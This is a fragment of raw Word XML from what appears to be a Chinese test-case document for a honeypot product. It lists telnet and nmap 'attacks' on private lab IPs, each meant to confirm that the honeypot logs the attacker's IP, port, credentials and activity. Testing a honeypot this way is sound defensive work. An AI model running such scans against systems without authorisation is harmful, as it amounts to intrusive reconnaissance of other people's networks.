              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>蜜罐功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1F60EB36" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44709661"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2E45D9F6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48C77A39" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击方式：</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>telnet 192.168.1.194 23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27A8BDF7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>暴露端口：23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F8C7DBB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>后如下</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BC02FF9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02DB7663" wp14:editId="38597694">
                  <wp:extent cx="4104005" cy="1242695"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="190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97"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1242695"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="36FD3069" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B26D19A" wp14:editId="7B43D683">
                  <wp:extent cx="4104005" cy="1119505"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="2349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98"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1119505"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A36F487" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74894A0F" wp14:editId="51EB25FF">
                  <wp:extent cx="4104005" cy="1212850"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="635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99"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1212850"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="194FA45B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="02E6AA1B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="642C3A47"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0FC49076" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>得到攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="53C11804" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="661879DD"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54080BFF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31C33E40" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:r w:rsidRPr="00536672">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="360" w:name="_Toc36487963"/>
      <w:r w:rsidRPr="00536672">
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="360"/>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3E0BEF5E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A37ED33"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3E939019" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="008819BA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AEAAC48"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47E03CC5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>发起攻击，捕获攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="571D7047" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="004FA4FA"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0A78CB57" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>蜜罐功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4F7C469F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F69338E"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21EB874F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63B2A86E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>攻击方式：</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nmap -v -p21,23,42,69,88,443,445,1433,1723,1883,1900,1900,2222,3306,5060,5061,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F46FC8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5060,8081,9200,11211 -A  192.168.1.197</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5771341B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>后如下</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CE8D197"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="451D8DEA" wp14:editId="19DA2187">
                  <wp:extent cx="4104005" cy="657860"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="2540"/>
                  <wp:docPr id="36" name="图片 36" descr="C:\Users\idear\AppData\Local\Temp\15294936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idear\AppData\Local\Temp\1529493654(1).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104005" cy="657860"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ABD6944" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0266A9D0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DAE1168"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49DEC635"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>得到攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="30C1C6B5" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="378D39C6"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3FEE3706" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14F0EC51" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="361" w:name="_Toc36487964"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>低交互攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="361"/>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45E03E58" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79A69BBD"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07B1AA55" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>低交互攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2F986FD2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46C48A0A"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7CF073D3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>发起攻击，捕获攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="41E0FBD8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0606A309"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47A93848" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>蜜罐功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4104497F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F2A7791"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4B39D74F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>一些低交互攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0505BF41" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>攻击方式：由于都是</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>低交互式，可以使用</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>触发各端口请求。</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>telnet 192.168.1.194 21</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 42</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 69</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8081</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 443</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 445</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1433</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1723</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1883</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1900</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
